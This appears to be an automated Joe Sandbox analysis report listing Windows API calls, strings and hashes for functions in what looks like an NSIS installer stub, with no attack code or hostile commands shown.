                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                          • String ID: (7B
                                                                                                          • API String ID: 184305955-3251261122
                                                                                                          • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                          • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                          • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                          • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                          APIs
                                                                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                          • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,74DF3420,00435000,00000000), ref: 00403B59
                                                                                                          • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                          • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                          • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                          • API String ID: 1975747703-1425696872
                                                                                                          • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                          • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                          • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                          • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                          • GetSysColor.USER32(?), ref: 004045FE
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                          • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                          • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                          • SetCursor.USER32(00000000), ref: 00404720
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                          • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040477D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                          • String ID: N
                                                                                                          • API String ID: 3103080414-1130791706
                                                                                                          • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                          • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                          • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                          • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                          • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                          • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                            • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                            • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                            • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                            • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: (7B$A
                                                                                                          • API String ID: 2624150263-3645020878
                                                                                                          • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                          • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                          • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                          • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                          • wsprintfA.USER32 ref: 004060B3
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                            • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                          • API String ID: 2171350718-461813615
                                                                                                          • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                          • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                          • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                          • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                            • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                          • GlobalAlloc.KERNEL32(?,0040A230), ref: 004030F0
                                                                                                          Strings
                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                          • soft, xrefs: 00403020
                                                                                                          • Null, xrefs: 00403029
                                                                                                          • Error launching installer, xrefs: 00402F80
                                                                                                          • Inst, xrefs: 00403017
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 2803837635-787788815
                                                                                                          • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                          • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                          • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                          • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                          • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                          • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                          • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                          Strings
                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 717251189-730719616
                                                                                                          • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                          • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                          • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                          • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                          • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                          • GetSysColor.USER32(?), ref: 0040444C
                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                          • DeleteObject.GDI32(?), ref: 00404476
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                          • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                          • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                          APIs
                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                                                                            • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                          • String ID: 9
                                                                                                          • API String ID: 163830602-2366072709
                                                                                                          • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                          • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                          • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                          • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                          • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                          • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2531174081-0
                                                                                                          • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                          • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                          • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                          • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                          • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                          • wsprintfW.USER32 ref: 00402EF5
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
